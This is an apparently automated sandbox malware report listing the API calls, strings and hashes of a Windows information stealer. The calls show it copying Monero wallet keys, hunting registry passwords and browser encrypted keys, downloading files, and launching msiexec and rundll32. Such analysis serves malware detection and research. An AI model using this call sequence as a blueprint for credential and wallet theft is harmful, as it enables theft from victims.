                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: de8109da76d62d8cb20fd8f8fadf069d4940dd8caf425b7286e727a0781574c6
                                  • Instruction ID: a6c19aa63459c72c8ab8869791e09a58ff75c4ee5d90d349a05c1f7ba97aef5b
                                  • Opcode Fuzzy Hash: de8109da76d62d8cb20fd8f8fadf069d4940dd8caf425b7286e727a0781574c6
                                  • Instruction Fuzzy Hash: 8F71E1B1910208ABDB08EFE4DC89FDEB7B8BF88700F148518F519A7290DB749955CF65
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 002431C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0024335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 002434EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 8daba1561233a89110bf40ffa2c56d0b0b1aad11d05b1843cd5f8ee1a1f10a5b
                                  • Instruction ID: c584787d57b746bab70b7c8b1a13ae7ae6d16d1c2b1619242540c8756fdf4f9f
                                  • Opcode Fuzzy Hash: 8daba1561233a89110bf40ffa2c56d0b0b1aad11d05b1843cd5f8ee1a1f10a5b
                                  • Instruction Fuzzy Hash: D312ED71860108AAEB1DFBA0DC92FEDB738EF14300F504159F50666191EF742B6ACFA6
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 00236280: InternetOpenA.WININET(00250DFE,00000001,00000000,00000000,00000000), ref: 002362E1
                                    • Part of subcall function 00236280: StrCmpCA.SHLWAPI(?,0104FCA0), ref: 00236303
                                    • Part of subcall function 00236280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00236335
                                    • Part of subcall function 00236280: HttpOpenRequestA.WININET(00000000,GET,?,0104F3F8,00000000,00000000,00400100,00000000), ref: 00236385
                                    • Part of subcall function 00236280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002363BF
                                    • Part of subcall function 00236280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002363D1
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00245318
                                  • lstrlen.KERNEL32(00000000), ref: 0024532F
                                    • Part of subcall function 00248E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00248E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00245364
                                  • lstrlen.KERNEL32(00000000), ref: 00245383
                                  • lstrlen.KERNEL32(00000000), ref: 002453AE
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: bcd15ad26a216a3016d0fc996bac8ebc967280c231de3d51fc5fb665d7a9dd4e
                                  • Instruction ID: b9c55556155965a23d8d55fc635094abbb6b179d093eef96ac494bed85ffcde7
                                  • Opcode Fuzzy Hash: bcd15ad26a216a3016d0fc996bac8ebc967280c231de3d51fc5fb665d7a9dd4e
                                  • Instruction Fuzzy Hash: D1510B709701089BEB1CFF60C996AED7779EF50305F504128F80A5A192EF346B66CF62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 02d05ccebfb47b877bfa795f066732bff8013bff1c2a537e9b44211daf3b1273
                                  • Instruction ID: e886aa0a5f7bd68b5a14e8c16b1929f1ef9dfcf3ab6424ef1ae9e3e907b2392f
                                  • Opcode Fuzzy Hash: 02d05ccebfb47b877bfa795f066732bff8013bff1c2a537e9b44211daf3b1273
                                  • Instruction Fuzzy Hash: 71C163B59502199BCB18EF60DC89FEE7379BB54304F0045D8E50AA7241DB70AEE5CF91
                                  APIs
                                    • Part of subcall function 00248DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00248E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 002442EC
                                  • lstrcat.KERNEL32(?,0104F128), ref: 0024430B
                                  • lstrcat.KERNEL32(?,?), ref: 0024431F
                                  • lstrcat.KERNEL32(?,0104D8E0), ref: 00244333
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 00248D90: GetFileAttributesA.KERNEL32(00000000,?,00231B54,?,?,0025564C,?,?,00250E1F), ref: 00248D9F
                                    • Part of subcall function 00239CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00239D39
                                    • Part of subcall function 002399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                    • Part of subcall function 002399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                    • Part of subcall function 002399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                    • Part of subcall function 002399C0: ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                    • Part of subcall function 002399C0: LocalFree.KERNEL32(0023148F), ref: 00239A90
                                    • Part of subcall function 002399C0: CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                    • Part of subcall function 002493C0: GlobalAlloc.KERNEL32(00000000,002443DD,002443DD), ref: 002493D3
                                  • StrStrA.SHLWAPI(?,0104F038), ref: 002443F3
                                  • GlobalFree.KERNEL32(?), ref: 00244512
                                    • Part of subcall function 00239AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239AEF
                                    • Part of subcall function 00239AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00234EEE,00000000,?), ref: 00239B01
                                    • Part of subcall function 00239AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239B2A
                                    • Part of subcall function 00239AC0: LocalFree.KERNEL32(?,?,?,?,00234EEE,00000000,?), ref: 00239B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 002444A3
                                  • StrCmpCA.SHLWAPI(?,002508D1), ref: 002444C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002444D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 002444E5
                                  • lstrcat.KERNEL32(00000000,00250FB8), ref: 002444F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: 096d4e6f5d4799f6c09a3940d7e32604339490667cc814b298115c7ff6d4124a
                                  • Instruction ID: fe633057186dc37149fdca9c1b3437414b710456ee44e1a63a3d1aa570e3c9f7
                                  • Opcode Fuzzy Hash: 096d4e6f5d4799f6c09a3940d7e32604339490667cc814b298115c7ff6d4124a
                                  • Instruction Fuzzy Hash: 907127B6D20208A7DB14FBA0DC85FEE737DAB88300F044598F60997181DA74DB65CF96
                                  APIs
                                    • Part of subcall function 002312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002312B4
                                    • Part of subcall function 002312A0: RtlAllocateHeap.NTDLL(00000000), ref: 002312BB
                                    • Part of subcall function 002312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002312D7
                                    • Part of subcall function 002312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002312F5
                                    • Part of subcall function 002312A0: RegCloseKey.ADVAPI32(?), ref: 002312FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 0023134F
                                  • lstrlen.KERNEL32(?), ref: 0023135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00231377
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 00248B60: GetSystemTime.KERNEL32(00250E1A,0104EC50,002505AE,?,?,002313F9,?,0000001A,00250E1A,00000000,?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 00248B86
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00231465
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002399EC
                                    • Part of subcall function 002399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00239A11
                                    • Part of subcall function 002399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00239A31
                                    • Part of subcall function 002399C0: ReadFile.KERNEL32(000000FF,?,00000000,0023148F,00000000), ref: 00239A5A
                                    • Part of subcall function 002399C0: LocalFree.KERNEL32(0023148F), ref: 00239A90
                                    • Part of subcall function 002399C0: CloseHandle.KERNEL32(000000FF), ref: 00239A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 002314EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: d30dec74f4060e2e97b34f0ca8ee5db99ae2b7ed965c08cf31b5f9b23eeda1be
                                  • Instruction ID: ee802a876515d27e6eaf86d1952f3d1f851cefb389a9987fd9055d9d22ececdf
                                  • Opcode Fuzzy Hash: d30dec74f4060e2e97b34f0ca8ee5db99ae2b7ed965c08cf31b5f9b23eeda1be
                                  • Instruction Fuzzy Hash: 6A5147B1D6011957DB19FB60DD92FED733CEF54304F4045A8B60A62092EE305BA9CFA6
                                  APIs
                                    • Part of subcall function 002372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0023733A
                                    • Part of subcall function 002372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002373B1
                                    • Part of subcall function 002372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0023740D
                                    • Part of subcall function 002372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00237452
                                    • Part of subcall function 002372D0: HeapFree.KERNEL32(00000000), ref: 00237459
                                  • lstrcat.KERNEL32(00000000,002517FC), ref: 00237606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00237648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 0023765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0023768F
                                  • lstrcat.KERNEL32(00000000,00251804), ref: 002376A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002376D3
                                  • lstrcat.KERNEL32(00000000,00251808), ref: 002376ED
                                  • task.LIBCPMTD ref: 002376FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: 36f7ee937e1161c6687422c9659816ee092db5e43821eba8500203b95c5dc8a7
                                  • Instruction ID: 64b323fc35bc4a2c838111a24bca9deff242650e44fb53db25feb148c97b34dc
                                  • Opcode Fuzzy Hash: 36f7ee937e1161c6687422c9659816ee092db5e43821eba8500203b95c5dc8a7
                                  • Instruction Fuzzy Hash: 593130B1920209DFCB18EBE4DC56DFF7779BB84302F144128F116A7250DA34A9A6CF56
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00234839
                                    • Part of subcall function 002347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00234849
                                  • InternetOpenA.WININET(00250DF7,00000001,00000000,00000000,00000000), ref: 0023610F
                                  • StrCmpCA.SHLWAPI(?,0104FCA0), ref: 00236147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0023618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002361B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 002361DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0023620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00236249
                                  • InternetCloseHandle.WININET(?), ref: 00236253
                                  • InternetCloseHandle.WININET(00000000), ref: 00236260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 8202e4164248378f819421f956f248134ea03fb7056e1d1ca30f5f04d35e8e1c
                                  • Instruction ID: 14252d0be62bc15b5fdad057b823525d7e4ec76299a5b27e2d71ec9572e12136
                                  • Opcode Fuzzy Hash: 8202e4164248378f819421f956f248134ea03fb7056e1d1ca30f5f04d35e8e1c
                                  • Instruction Fuzzy Hash: 5F5195B1960218ABDF24DF50DC49BEE77B8FB44705F1080A8F609A71C0DB74AA99CF95
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0023733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002373B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0023740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00237452
                                  • HeapFree.KERNEL32(00000000), ref: 00237459
                                  • task.LIBCPMTD ref: 00237555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 71c463ab59340d6efb1e1351ce70a172304d2eedea8bd17cd023380f8e011028
                                  • Instruction ID: 29edc09f5550abb5bd094fcd67904e47d46d85f252d8ac955e822e241caf0e8b
                                  • Opcode Fuzzy Hash: 71c463ab59340d6efb1e1351ce70a172304d2eedea8bd17cd023380f8e011028
                                  • Instruction Fuzzy Hash: AB611DF592426C9BDB24DF50CD45BDAB7B8BF44300F0081E9E689A6141DBB06BD9CF91
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 0023BC9F
